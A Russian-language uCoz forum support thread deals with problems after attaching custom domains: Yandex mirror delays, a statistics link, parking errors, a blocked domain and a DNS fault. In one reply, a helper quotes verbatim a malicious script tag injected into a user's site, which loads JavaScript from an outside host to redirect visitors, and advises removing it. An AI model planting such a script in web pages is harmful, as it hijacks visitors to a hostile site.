Модератор форума: Yuri_G, ilia_halupko |
Сообщество uCoz Мастерская uCoz Домен для сайта Домен: последствия переноса |
Домен: последствия переноса |
Актуальная информация! 6.05.2015
============================================== К сведению тем, кто переезжает на свой домен: У Яндекса, похоже, была какая-то техническая проблема с зеркальщиком. По крайней мере есть примеры, которые больше 3-х месяцев не могут склеиться в группу зеркал. Свежий ответ от Яндекса по одному из таких сайтов: Цитата Здравствуйте! К сожалению, задержка вызвана техническими накладками с нашей стороны. Приносим Вам свои искренние извинения за возможные неудобства и просим еще некоторое время подождать. Ориентировочно, Ваши сайты будут признаны зеркалами друг друга в течение следующего месяца. ======================================================== В этой теме вы можете решить проблемы, возникшие после прикрепления домена: старые адреса, неоткрывающиеся страницы, вопросы индексации и прочее. Или узнать, что ждёт ваш сайт после переноса. Правила ведения темы:
|
Может быть Вы не поняли. Я поменял домен, соответственно поменял адреса всех страниц сайта.
Только на страницу статистики ведет прежний адрес с доменом юкоз. Можно его поменять на мой теперишний? |
|
cosmos-x.ru
|
norton3775, страницей статистики вы называете эту страницу? http://cosmos.ucoz.ru/panel/?a=ustat&u=cosmos&d=0&il=ru
похоже только так. но я же сказала можете прописать счетчик исходником и там прописать новые адреса и на картинку и на саму страницу статистики. в коде будет чисто без старых адресов. |
Здравствуйте. Получил домен в подарок на domain.ucoz.com. Домен припаркован, но не прикреплен. Так же выдает следующее: "Временная техническая проблема при проверке статуса домена. Пожалуйста, попробуйте обновить страницу через 15 минут. Если проблема сохранится, сообщите в Службу поддержки". Я вообще хотел домен в зоне .RU, по при парковке мне приходило сообщение: "Serverside error. Try again later." Пришлось выбрать .COM. Однако все равно хотелось бы узнать в чем причина.
|
Alconry-ADMIN,
Цитата Временная техническая проблема при проверке статуса домена, по причине DDoS-атаки на один из ДЦ. Информация о работоспособности серверов //forum.ucoz.ru/forum/31-28494-1 |
Ребята, подскажите пожалуйста захожу на свой домен kulinarof.net а он не активен. Думала закончился срок регистрации, но он заканчивается только в декабре. Помогите пожалуйста!!!
Когда захожу на domain.ucoz.com Вот что пишетСтатус: Заблокирован Примечание: это доменное имя в настоящее время заблокирован. Эта функция предусмотрена для защиты от мошеннических приобретение доменных имен, как в этом статусе доменное имя не может быть передана или изменены. |
Biata, у вас на сайте установлен вредоносный код, он перенаправляет на другой сайт, через быструю замену удалите код:
<script language="javascript" src="http://gocash2.ru3.biz/js/back.php?id=43"></script> Если смотреть сайт с отключённым java, сайт открывается нормально. И да, обязательно смените все пароли от ПУ-хи и секретное слово Прикрепления:
9565285.jpg
(88.1 Kb)
Сообщение отредактировал bandjuk - Воскресенье, 21 Июл 2013, 02:04:35
|
|
Здравствуйте! Я прикрепил домен (не юкозовский) к своему сайту. С месяц после прикрепления всё работало и ресурс был доступен по новому адресу. Но в один неожиданный момент домен начал выдавать ошибку 404 Not Found. Через старый домен зайти можно, в панели управления написано, что новый домен прикреплён и всё работает. Адрес домена . Что делать и на чьей вообще стороне возникла проблема не могу понять. На хостинге у которого покупал домен так же написано, что всё работает. Помогите плз.
|
|
bandjuk, забыл просто отписаться, что сам всё исправил) Оказалось, настройки DNS у регистратора слетели волшебным образом. Но всё равно спасибо за ответ.
|
| |||